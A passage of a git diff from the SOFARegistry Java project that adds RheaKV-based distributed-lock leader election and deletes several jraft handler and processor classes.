LeaderLockDomain leaderLockInfo=null; + try { + map = CommandCodec.decodeCommand(bytes, leaderInfoMap.getClass()); + leaderLockInfo = map.get(defaultCommonConfig.getClusterId()); + }catch (NullPointerException e){ + LOG.info("DISTRIBUTE_LOCk RheaKV is empty"); + } + + if(leaderLockInfo==null){ + return competeLeader(defaultCommonConfig.getClusterId()); + } + + ElectorRole role = amILeader(leaderLockInfo.getLeader()) ? ElectorRole.LEADER : ElectorRole.FOLLOWER; + + if(role==ElectorRole.LEADER){ + //主节点 + //String leader = leaderLockInfo.getLeaderInfo().getLeader(); + leaderLockInfo=onLeaderWorking(leaderLockInfo,myself()); + }else{ + //子节点 + leaderLockInfo=onFollowWorking(leaderLockInfo,myself()); + } + + LeaderInfo result = leaderFrom(leaderLockInfo.getOwner(),leaderLockInfo.getEpoch(),leaderLockInfo.getGmtModified(),leaderLockInfo.getDuration()); + //更新leaderInfo并重新插入rheakv + leaderLockInfo.setEpoch(result.getEpoch()); + leaderLockInfo.setLeader(result.getLeader()); + leaderLockInfo.setExpireTimestamp(result.getExpireTimestamp()); + leaderInfoMap.put(leaderLockInfo.getDataCenter(),leaderLockInfo); + rheaKVStore.bPut(distributeLock,CommandCodec.encodeCommand(leaderInfoMap)); + + if (LOG.isInfoEnabled()) { + LOG.info("meta role : {}, leaderInfo: {}", role, result); + } + return result; + } + + + private LeaderLockDomain onLeaderWorking(LeaderLockDomain lock, String myself) { + Date date=new Date(); + byte[] bytes = rheaKVStore.bGet(distributeLock); + Map map = null; + //获取全部Lock存储 + try{ + map = CommandCodec.decodeCommand(bytes, leaderInfoMap.getClass()); + }catch (NullPointerException e){ + LOG.info("DISTRIBUTE_LOCk RheaKV is empty"); + } + LeaderLockDomain leaderLockInfo = map.get(lock.getDataCenter()); + if(leaderLockInfo==null){ + LOG.error("leader:{} heartbeat error.", myself); + return lock; + }else{ + lock.setGmtModified(date); + if (LOG.isInfoEnabled()) { + LOG.info("leader heartbeat: {}", myself); + } + return lock; + } + } + + + public LeaderLockDomain onFollowWorking(LeaderLockDomain lock, String myself) { + long date=System.currentTimeMillis(); + byte[] bytes = rheaKVStore.bGet(distributeLock); + Map map = null; + try { + map = CommandCodec.decodeCommand(bytes, leaderInfoMap.getClass()); + }catch (NullPointerException e){ + LOG.info("DISTRIBUTE_LOCk RheaKV is empty"); + } + + if(date>lock.getExpireTimestamp()){ + if (LOG.isInfoEnabled()) { + LOG.info("lock expire: {}, meta elector start: {}", lock, myself); + } + LeaderLockDomain leaderLockInfo = map.get(lock.getDataCenter()); + leaderLockInfo.setGmtModified(new Date()); + leaderLockInfo.setOwner(myself); + if (LOG.isInfoEnabled()) { + LOG.info("elector finish, new lock: {}", lock); + } + return leaderLockInfo; + } + return lock; + } + + + static LeaderInfo leaderFrom(String owner, long epoch, Date lastHeartbeat, long duration) { + return calcLeaderInfo( + owner, + epoch, + lastHeartbeat, + duration); + } + + /** + * compete and return leader + * + * @param dataCenter + * @return + */ + private LeaderInfo competeLeader(String dataCenter){ + Date date=new Date(); + byte[] bytes = rheaKVStore.bGet(distributeLock); + Map map=null; + LeaderLockDomain leaderLockInfo=null; + LeaderInfo leaderInfo=null; + //获取全部Lock存储 + try { + map = CommandCodec.decodeCommand(bytes, leaderInfoMap.getClass()); + leaderLockInfo = map.get(dataCenter); + //遍历distribute_lock查看,是否存在"META-MASTER" + for(Map.Entry entry: map.entrySet()){ + LeaderLockDomain value = entry.getValue(); + if(value.getLockName()==lockName){ + if (LOG.isInfoEnabled()) { + LOG.info("meta: {} compete error, leader is: {}.", myself(), value.getLeader()); + } + return new LeaderInfo(value.getEpoch(),value.getLeader(),value.getExpireTimestamp()); + } + } + }catch (NullPointerException e){ + LOG.info("DISTRIBUTE_LOCk RheaKV is empty"); + } + + if(leaderLockInfo==null){ + //创建Lock + leaderInfo = leaderFrom(myself(), System.currentTimeMillis(), date, metaElectorConfig.getLockExpireDuration()); + leaderLockInfo=new LeaderLockDomain(lockName, + leaderInfo.getEpoch(), + leaderInfo.getLeader(), + leaderInfo.getExpireTimestamp(), + date, + dataCenter,myself(), + metaElectorConfig.getLockExpireDuration()); + + leaderInfoMap.put(dataCenter,leaderLockInfo); + rheaKVStore.bPut(distributeLock ,CommandCodec.encodeCommand(leaderInfoMap)); + + if (LOG.isInfoEnabled()) { + LOG.info("meta: {} compete success, become leader.", myself()); + } + }else { + //重新定义Lock + leaderLockInfo.setLockName(lockName); + leaderLockInfo.setGmtModified(date); + leaderLockInfo.setDataCenter(dataCenter); + leaderInfo = leaderFrom(leaderLockInfo.getLeader(), + leaderLockInfo.getEpoch(), + date, + metaElectorConfig.getLockExpireDuration()); + + leaderLockInfo.setExpireTimestamp(leaderInfo.getExpireTimestamp()); + + leaderInfoMap.put(dataCenter,leaderLockInfo); + rheaKVStore.bPut(distributeLock,CommandCodec.encodeCommand(leaderInfoMap)); + if (LOG.isInfoEnabled()) { + LOG.info("meta: {} compete success, become leader.", myself()); + } + } + return leaderInfo; + } + + +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/NotifyLeaderChangeHandler.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/NotifyLeaderChangeHandler.java deleted file mode 100644 index e2ebae18d..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/NotifyLeaderChangeHandler.java +++ /dev/null @@ -1,97 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.handler; - -import com.alipay.sofa.jraft.entity.PeerId; -import com.alipay.sofa.jraft.rpc.CliClientService; -import com.alipay.sofa.registry.jraft.bootstrap.RaftClient; -import com.alipay.sofa.registry.jraft.command.NotifyLeaderChange; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; - -/** - * - * @author shangyu.wh - * @version $Id: NotifyLeaderChangeHandler.java, v 0.1 2018-06-23 14:37 shangyu.wh Exp $ - */ -public class NotifyLeaderChangeHandler implements ChannelHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(NotifyLeaderChangeHandler.class); - - private String groupId; - - private CliClientService clientService; - - /** - * constructor - * @param groupId - */ - public NotifyLeaderChangeHandler(String groupId, CliClientService clientService) { - this.groupId = groupId; - this.clientService = clientService; - } - - @Override - public void connected(Channel channel) { - - } - - @Override - public void disconnected(Channel channel) { - - } - - @Override - public void received(Channel channel, Object message) { - - } - - @Override - public Object reply(Channel channel, Object message) { - - NotifyLeaderChange notifyLeaderChange = (NotifyLeaderChange) message; - LOGGER.info("Receive NotifyLeaderChange request:{},remote address:{}, localAddress:", - notifyLeaderChange, channel.getRemoteAddress(), channel.getLocalAddress()); - - //reset leader - if (clientService != null) { - PeerId peerId = RaftClient.refreshLeader(clientService, groupId, 5000); - if (peerId != null) { - LOGGER.info("Reset leader for raft group {},leader()", groupId, peerId); - } - } - - return null; - } - - @Override - public void caught(Channel channel, Object message, Throwable exception) { - - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return NotifyLeaderChange.class; - } -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/RaftClientConnectionHandler.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/RaftClientConnectionHandler.java deleted file mode 100644 index 2a605e2fd..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/RaftClientConnectionHandler.java +++ /dev/null @@ -1,90 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.handler; - -import com.alipay.sofa.jraft.RouteTable; -import com.alipay.sofa.jraft.entity.PeerId; -import com.alipay.sofa.registry.jraft.bootstrap.RaftClient; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; - -/** - * - * @author shangyu.wh - * @version $Id: RaftClientConnectionHandler.java, v 0.1 2018-06-01 14:27 shangyu.wh Exp $ - */ -public class RaftClientConnectionHandler implements ChannelHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(RaftClientConnectionHandler.class); - - private RaftClient raftClient; - - /** - * constructor - * @param raftClient - */ - public RaftClientConnectionHandler(RaftClient raftClient) { - this.raftClient = raftClient; - } - - @Override - public void connected(Channel channel) { - if (channel != null && channel.isConnected()) { - LOGGER.info("Raft Client connected,remote address:" + channel.getRemoteAddress() - + " localAddress:" + channel.getLocalAddress()); - } - } - - @Override - public void disconnected(Channel channel) { - if (channel != null && !channel.isConnected()) { - LOGGER.info("Raft Client disconnected,remote address:" + channel.getRemoteAddress() - + " localAddress:" + channel.getLocalAddress()); - } - //reset leader - if (RouteTable.getInstance().updateLeader(raftClient.getGroupId(), (PeerId) null)) { - LOGGER.info("Reset leader for raft group {}", raftClient.getGroupId()); - } - } - - @Override - public void received(Channel channel, Object message) { - - } - - @Override - public Object reply(Channel channel, Object message) { - return null; - } - - @Override - public void caught(Channel channel, Object message, Throwable exception) { - - } - - @Override - public HandlerType getType() { - return HandlerType.LISENTER; - } - - @Override - public Class interest() { - return null; - } -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/RaftServerConnectionHandler.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/RaftServerConnectionHandler.java deleted file mode 100644 index 96c60f51d..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/RaftServerConnectionHandler.java +++ /dev/null @@ -1,73 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.handler; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; - -/** - * - * @author shangyu.wh - * @version $Id: RaftServerConnectionHandler.java, v 0.1 2018-06-01 14:27 shangyu.wh Exp $ - */ -public class RaftServerConnectionHandler implements ChannelHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(RaftServerConnectionHandler.class); - - @Override - public void connected(Channel channel) { - if (channel != null && channel.isConnected()) { - LOGGER.info("Raft Server connected,remote address:" + channel.getRemoteAddress() - + " localAddress:" + channel.getLocalAddress()); - } - } - - @Override - public void disconnected(Channel channel) { - if (channel != null && !channel.isConnected()) { - LOGGER.info("Raft Server disconnected,remote address:" + channel.getRemoteAddress() - + " localAddress:" + channel.getLocalAddress()); - } - } - - @Override - public void received(Channel channel, Object message) { - - } - - @Override - public Object reply(Channel channel, Object message) { - return null; - } - - @Override - public void caught(Channel channel, Object message, Throwable exception) { - - } - - @Override - public HandlerType getType() { - return HandlerType.LISENTER; - } - - @Override - public Class interest() { - return null; - } -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/RaftServerHandler.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/RaftServerHandler.java deleted file mode 100644 index 12bbba9a6..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/handler/RaftServerHandler.java +++ /dev/null @@ -1,162 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.handler; - -import com.alipay.remoting.AsyncContext; -import com.alipay.sofa.jraft.entity.Task; -import com.alipay.sofa.registry.jraft.bootstrap.RaftServer; -import com.alipay.sofa.registry.jraft.command.ProcessRequest; -import com.alipay.sofa.registry.jraft.command.ProcessResponse; -import com.alipay.sofa.registry.jraft.processor.LeaderTaskClosure; -import com.alipay.sofa.registry.jraft.processor.Processor; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.RemotingException; -import com.alipay.sofa.registry.remoting.bolt.BoltChannel; -import com.caucho.hessian.io.Hessian2Output; -import com.caucho.hessian.io.SerializerFactory; - -import java.io.ByteArrayOutputStream; -import java.io.IOException; -import java.lang.reflect.Method; -import java.nio.ByteBuffer; - -/** - * - * @author shangyu.wh - * @version $Id: ServerHandler.java, v 0.1 2017-11-28 18:06 shangyu.wh Exp $ - */ -public class RaftServerHandler implements ChannelHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(RaftServerHandler.class); - - protected RaftServer raftServer; - - /** - * constructor - * @param raftServer - */ - public RaftServerHandler(RaftServer raftServer) { - this.raftServer = raftServer; - } - - @Override - public void connected(Channel channel) { - } - - @Override - public void disconnected(Channel channel) { - } - - @Override - public void caught(Channel channel, Object message, Throwable exception) { - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return ProcessRequest.class; - } - - @Override - public void received(Channel channel, Object message) throws RemotingException { - - if (!(channel instanceof BoltChannel)) { - LOGGER.error("Raft receive message channel error type!"); - throw new RemotingException("Raft receive message channel error type!"); - } - - if (!(message instanceof ProcessRequest)) { - LOGGER.error("Raft receive message error type!"); - throw new RemotingException("Raft receive message error type!"); - } - - BoltChannel boltChannel = (BoltChannel) channel; - AsyncContext asyncContext = boltChannel.getAsyncContext(); - - if (!raftServer.getFsm().isLeader()) { - asyncContext.sendResponse(ProcessResponse.redirect(raftServer.redirect()).build()); - return; - } - ProcessRequest processRequest = (ProcessRequest) message; - - long start = System.currentTimeMillis(); - - Method method = Processor.getInstance().getWorkMethod(processRequest); - - if (Processor.getInstance().isLeaderReadMethod(method)) { - Object obj = Processor.getInstance().process(method, processRequest); - long cost = System.currentTimeMillis() - start; - LOGGER.info("Raft server process request self cost:{},request={}", cost, processRequest); - asyncContext.sendResponse(obj); - } else { - LeaderTaskClosure closure = new LeaderTaskClosure(); - closure.setRequest(processRequest); - closure.setDone(status -> { - long cost = System.currentTimeMillis() - start; - LOGGER.info("Raft server process request by task cost:{},request={},status={}", cost, processRequest, - status); - if (status.isOk()) { - asyncContext.sendResponse(closure.getResponse()); - } else { - asyncContext.sendResponse(ProcessResponse.fail(status.getErrorMsg()).build()); - } - }); - - Task task = createTask(closure, processRequest); - - raftServer.getNode().apply(task); - } - } - - protected Task createTask(LeaderTaskClosure closure, ProcessRequest request) { - - final ByteArrayOutputStream byteStream = new ByteArrayOutputStream(); - Hessian2Output hessianOutput = new Hessian2Output(byteStream); - SerializerFactory serializerFactory = new SerializerFactory(); - hessianOutput.setSerializerFactory(serializerFactory); - try { - hessianOutput.writeObject(request); - hessianOutput.close(); - } catch (IOException e) { - LOGGER.error("Raft receive message serialize error!", e); - } - - byte[] cmdBytes = byteStream.toByteArray(); - - ByteBuffer data = ByteBuffer.allocate(cmdBytes.length); - data.put(cmdBytes); - data.flip(); - return new Task(data, closure); - } - - @Override - public Object reply(Channel channel, Object message) { - return null; - } - - @Override - public InvokeType getInvokeType() { - return InvokeType.ASYNC; - } -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/AbstractSnapshotProcess.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/AbstractSnapshotProcess.java deleted file mode 100644 index 1ce076dc2..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/AbstractSnapshotProcess.java +++ /dev/null @@ -1,71 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.processor; - -import com.alipay.sofa.registry.jraft.command.CommandCodec; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.util.FileUtils; - -import java.io.File; -import java.io.IOException; -import java.util.Arrays; - -/** - * - * @author shangyu.wh - * @version $Id: AbstractSnapshotProcess.java, v 0.1 2018-05-29 12:12 shangyu.wh Exp $ - */ -public abstract class AbstractSnapshotProcess implements SnapshotProcess { - - private static final Logger LOGGER = LoggerFactory.getLogger(AbstractSnapshotProcess.class); - - /** - * save snapshot to file - * @param path - * @param values - * @return - */ - public boolean save(String path, Object values) { - try { - FileUtils.writeByteArrayToFile(new File(path), CommandCodec.encodeCommand(values), - false); - return true; - } catch (IOException e) { - LOGGER.error("Fail to save snapshot", e); - return false; - } - } - - /** - * load snapshot from file - * @param path - * @param clazz - * @param - * @return - * @throws IOException - */ - public T load(String path, Class clazz) throws IOException { - byte[] bs = FileUtils.readFileToByteArray(new File(path)); - if (bs != null && bs.length > 0) { - return CommandCodec.decodeCommand(bs, clazz); - } - throw new IOException("Fail to load snapshot from " + path + ", content: " - + Arrays.toString(bs)); - } - -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/FollowerProcessListener.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/FollowerProcessListener.java deleted file mode 100644 index 3f1d0bfff..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/FollowerProcessListener.java +++ /dev/null @@ -1,31 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.processor; - -import com.alipay.sofa.jraft.entity.PeerId; - -/** - * - * @author shangyu.wh - * @version $Id: FollowerProcessListener.java, v 0.1 2018-06-23 15:10 shangyu.wh Exp $ - */ -public interface FollowerProcessListener { - - void startProcess(PeerId leader); - - void stopProcess(PeerId leader); -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/LeaderProcessListener.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/LeaderProcessListener.java deleted file mode 100644 index b26637338..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/LeaderProcessListener.java +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.processor; - -/** - * - * @author shangyu.wh - * @version $Id: LeaderProcessListener.java, v 0.1 2018-05-28 12:17 shangyu.wh Exp $ - */ -public interface LeaderProcessListener { - - void startProcess(); - - void stopProcess(); -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/LeaderTaskClosure.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/LeaderTaskClosure.java deleted file mode 100644 index 12d4337d5..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/LeaderTaskClosure.java +++ /dev/null @@ -1,85 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.processor; - -import com.alipay.sofa.jraft.Closure; -import com.alipay.sofa.jraft.Status; -import com.alipay.sofa.registry.jraft.command.ProcessRequest; - -/** - * - * @author shangyu.wh - * @version $Id: LeaderTaskClosure.java, v 0.1 2018-05-21 12:18 shangyu.wh Exp $ - */ -public class LeaderTaskClosure implements Closure { - - private ProcessRequest request; - private Closure done; - private Object response; - - @Override - public void run(Status status) { - if (this.done != null) { - done.run(status); - } - } - - /** - * Getter method for property request. - * - * @return property value of request - */ - public ProcessRequest getRequest() { - return request; - } - - /** - * Setter method for property request. - * - * @param request value to be assigned to property request - */ - public void setRequest(ProcessRequest request) { - this.request = request; - } - - /** - * Setter method for property done. - * - * @param done value to be assigned to property done - */ - public void setDone(Closure done) { - this.done = done; - } - - /** - * Getter method for property response. - * - * @return property value of response - */ - public Object getResponse() { - return response; - } - - /** - * Setter method for property response. - * - * @param response value to be assigned to property response - */ - public void setResponse(Object response) { - this.response = response; - } -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/Processor.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/Processor.java deleted file mode 100644 index a395a365d..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/Processor.java +++ /dev/null @@ -1,188 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.processor; - -import com.alipay.sofa.registry.jraft.bootstrap.ServiceStateMachine; -import com.alipay.sofa.registry.jraft.command.ProcessRequest; -import com.alipay.sofa.registry.jraft.command.ProcessResponse; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.store.api.annotation.ReadOnLeader; - -import java.lang.invoke.MethodHandle; -import java.lang.invoke.MethodHandles; -import java.lang.reflect.Method; -import java.util.HashMap; -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: Processor.java, v 0.1 2018-05-17 19:05 shangyu.wh Exp $ - */ -public class Processor { - - private static final Logger LOG = LoggerFactory - .getLogger(Processor.class); - - private Map> workerMethods = new HashMap<>(); - - private Map workers = new HashMap<>(); - - private static volatile Processor instance; - - /** - * get processor instance - * @return - */ - public static Processor getInstance() { - if (instance == null) { - synchronized (Processor.class) { - if (instance == null) { - instance = new Processor(); - } - } - } - return instance; - } - - public void addWorker(String serviceId, Class interfaceClazz, Object target) { - if (workers.get(serviceId) != null) { - LOG.warn("Service {} has bean existed!", serviceId); - return; - } - - Map publicMethods = new HashMap(); - for (Method m : interfaceClazz.getMethods()) { - StringBuilder mSigs = new StringBuilder(); - mSigs.append(m.getName()); - for (Class paramType : m.getParameterTypes()) { - mSigs.append(paramType.getName()); - } - publicMethods.put(mSigs.toString(), m); - } - - workerMethods.put(serviceId, publicMethods); - workers.put(serviceId, target); - } - - public ProcessResponse process(ProcessRequest request) { - String methodName = request.getMethodName(); - String serviceId = request.getServiceName(); - Object target = workers.get(serviceId); - if (target == null) { - LOG.warn("Can not find service {} from process!", serviceId); - return ProcessResponse.fail( - String.format("Can not find service %s from process!", serviceId)).build(); - } - - try { - StringBuilder methodKeyBuffer = new StringBuilder(); - methodKeyBuffer.append(methodName); - String[] sig = request.getMethodArgSigs(); - for (int i = 0; i < sig.length; i++) { - methodKeyBuffer.append(sig[i]); - } - Method appServiceMethod = workerMethods.get(serviceId).get(methodKeyBuffer.toString()); - if (appServiceMethod == null) { - LOG.error("Can not find method {} from processor by serviceId {}", methodName, - serviceId); - throw new NoSuchMethodException("Can not find method from processor!"); - } - - Object[] methodArg = request.getMethodArgs(); - MethodHandle methodHandle = MethodHandles.lookup().unreflect(appServiceMethod); - Object ret = methodHandle.bindTo(target).invokeWithArguments(methodArg); - if (ret != null) { - return ProcessResponse.ok(ret).build(); - } else { - return ProcessResponse.ok().build(); - } - - } catch (Throwable e) { - LOG.error("Process service request {} error!", request, e); - return ProcessResponse.fail( - String.format("Process service %s method %s error!", serviceId, methodName)) - .build(); - } - } - - public ProcessResponse process(Method method, ProcessRequest request) { - String methodName = request.getMethodName(); - String serviceId = request.getServiceName(); - Object target = workers.get(serviceId); - if (target == null) { - LOG.warn("Can not find service {} from process!", serviceId); - return ProcessResponse.fail( - String.format("Can not find service %s from process!", serviceId)).build(); - } - - try { - Object[] methodArg = request.getMethodArgs(); - MethodHandle methodHandle = MethodHandles.lookup().unreflect(method); - Object ret = methodHandle.bindTo(target).invokeWithArguments(methodArg); - if (ret != null) { - return ProcessResponse.ok(ret).build(); - } else { - return ProcessResponse.ok().build(); - } - - } catch (Throwable e) { - LOG.error("Process service request {} error!", request, e); - return ProcessResponse.fail( - String.format("Process service %s method %s error!", serviceId, methodName)) - .build(); - } - } - - public Method getWorkMethod(ProcessRequest request) { - String methodName = request.getMethodName(); - String serviceId = request.getServiceName(); - try { - - StringBuilder methodKeyBuffer = new StringBuilder(); - methodKeyBuffer.append(methodName); - String[] sig = request.getMethodArgSigs(); - for (int i = 0; i < sig.length; i++) { - methodKeyBuffer.append(sig[i]); - } - Method appServiceMethod = workerMethods.get(serviceId).get(methodKeyBuffer.toString()); - if (appServiceMethod == null) { - LOG.error("Can not find method {} from processor by serviceId {}", methodName, - serviceId); - throw new NoSuchMethodException("Can not find method from processor!"); - } - return appServiceMethod; - } catch (Exception e) { - LOG.error("Process request {} get WorkMethod error!", request, e); - throw new RuntimeException(String.format("Process request %s get WorkMethod error!", - request)); - } - } - - public Map getWorkers() { - return workers; - } - - public boolean isLeaderReadMethod(Method method) { - if (ServiceStateMachine.getInstance().isLeader()) { - return method != null && method.isAnnotationPresent(ReadOnLeader.class); - } - return false; - } - -} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/ProxyHandler.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/ProxyHandler.java deleted file mode 100644 index f96098cf2..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/ProxyHandler.java +++ /dev/null @@ -1,114 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY 